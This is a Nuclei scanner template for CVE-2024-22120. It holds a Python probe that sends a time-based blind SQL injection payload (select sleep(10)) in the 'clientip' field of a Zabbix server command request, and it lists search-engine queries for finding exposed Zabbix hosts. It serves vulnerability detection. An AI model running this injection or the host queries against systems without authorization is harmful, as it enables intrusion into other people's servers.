id: CVE-2024-22120

info:
  name: Zabbix Server - Time-Based Blind SQL injection
  author: CodeStuffBreakThings
  severity: critical
  description: |
    The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
  remediation: |
    Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
  reference:
    - https://support.zabbix.com/browse/ZBX-24505#/
    - https://github.com/W01fh4cker/CVE-2024-22120-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
    - https://support.zabbix.com/browse/ZBX-24505
    - https://github.com/AboSteam/POPC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-22120
    cwe-id: CWE-20
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
      - http.favicon.hash:"892542951"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2024,authenticated,zabbix,sqli
variables:
  HOST: "{{Host}}"
  PORT: "{{Port}}"
  SID: "{{SID}}"
  HOSTID: "{{HOSTID}}"

code:
  - engine:
      - py
      - python3
    source: |
      import os, struct, socket
      from datetime import datetime
      hostname=os.getenv('HOST')
      port=int(os.getenv('PORT'))
      sid=os.getenv('SID')
      hostid=os.getenv('HOSTID')
      zbx_header = "ZBXD\x01".encode()
      message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
      message_length = struct.pack('<q', len(message_json))
      message = zbx_header + message_length + message_json.encode()
      before_query = datetime.now().timestamp()
      s = socket.socket()
      s.connect((hostname,port))
      s.send(message)
      response = s.recv(1024)
      s.close()
      after_query = datetime.now().timestamp()
      responsetime = after_query - before_query
      if responsetime >= 10 and zbx_header in response:
          print("Vulnerable to CVE-2024-22120")

    matchers:
      - type: word
        words:
          - "Vulnerable to CVE-2024-22120"
# digest: 4a0a00473045022100d6eade8e599069ba5f94de261357dce41150496111312f3c27dd0f4bea5371ef0220244fbe4ba8eca7787fde62c8569d98ee2ddb2aeb614527b154ae892f1f002abc:922c64590222798bb761d5b6d8e72950